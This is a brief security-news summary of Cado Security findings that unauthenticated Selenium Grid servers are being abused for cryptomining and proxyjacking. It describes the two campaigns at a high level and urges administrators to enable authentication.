Priya Patel
TLDR:
Exposed Selenium Grid servers are being targeted by threat actors for crypto mining and proxyjacking campaigns due to their lack of authentication. Cado Security researchers observed two different attacks using Selenium Grid instances to deploy malicious payloads like cryptocurrency miners and proxyware solutions. Users are advised to configure authentication to prevent misuse of Selenium Grid servers.
Article Summary:
Internet-exposed Selenium Grid servers are under attack by bad actors conducting illicit cryptocurrency mining and proxyjacking campaigns. These attacks exploit the default configuration of Selenium Grid, which lacks authentication, making it vulnerable to exploitation. Cado Security researchers observed two different campaigns targeting Selenium Grid servers for malicious activities like deploying cryptocurrency miners and proxyware solutions.
The first attack leverages a Base64-encoded Python script injected through the “goog:chromeOptions” dictionary to introduce a reverse shell and a bash script that retrieves malicious programs like IPRoyal Pawn and EarnFM. IPRoyal Pawn allows users to sell their internet bandwidth as a residential proxy, while EarnFM claims to generate passive income by sharing internet connections.
The second attack drops a Golang-based ELF binary after checking the machine type, aiming to escalate privileges and deploy an XMRig cryptocurrency miner. These attacks highlight the potential misuse of misconfigured Selenium Grid instances by threat actors, emphasizing the importance of configuring authentication to secure these servers.
This campaign serves as a warning to organizations that rely on Selenium Grid for web browser testing, urging them to enable authentication to prevent unauthorized access. The attacks demonstrate how threat actors exploit vulnerable servers to deploy cryptocurrency miners and proxyware solutions, underscoring the need for proactive security measures.
